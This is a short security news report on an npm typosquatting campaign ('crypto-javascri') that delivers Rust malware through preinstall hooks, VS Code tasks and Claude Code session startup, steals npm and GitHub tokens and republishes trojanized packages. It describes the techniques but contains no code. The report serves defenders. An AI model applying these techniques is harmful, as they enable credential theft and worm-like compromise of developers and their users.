Sukob Threat Actor Deploys Rust Malware via npm Typosquatting to Hijack Developer Credentials and CI/CD Pipelines

A sophisticated npm supply chain attack has surfaced, exploiting typosquatting techniques to distribute a Rust-based malware payload designed to harvest developer credentials and establish persistent footholds across software ecosystems. The campaign, attributed to the Sukob threat actor, leverages a malicious package named 'crypto-javascri'—a near-miss of the widely-used 'crypto-js' library—to silently compromise systems when developers inadvertently mistype the correct package name during installation.

The infection chain employs multiple delivery vectors, including npm preinstall hooks, VS Code task configurations, and Claude Code session initialization, to deploy a Rust binary that communicates with command-and-control infrastructure via the Tor Arti client. This architectural choice significantly complicates network-based detection efforts and enables resilient, evasive C2 operations. Once executed, the malware harvests npm and GitHub credentials, validates the stolen tokens, and uses them to republish trojanized versions of all packages under the compromised developer's namespace—effectively transforming the attack into a self-propagating worm that spreads through trusted package ecosystems.

The campaign raises critical concerns for organizations relying on npm-based development workflows and automated CI/CD pipelines. Security researchers warn that cloud-aware conditional gates within the malware allow it to dynamically adjust its behavior based on the target environment, while systemd persistence mechanisms enable long-term compromise even after initial detection attempts. The combination of typosquatting, credential theft, and worm-like propagation through legitimate package publication channels signals escalating complexity in supply chain threats targeting the software development supply chain.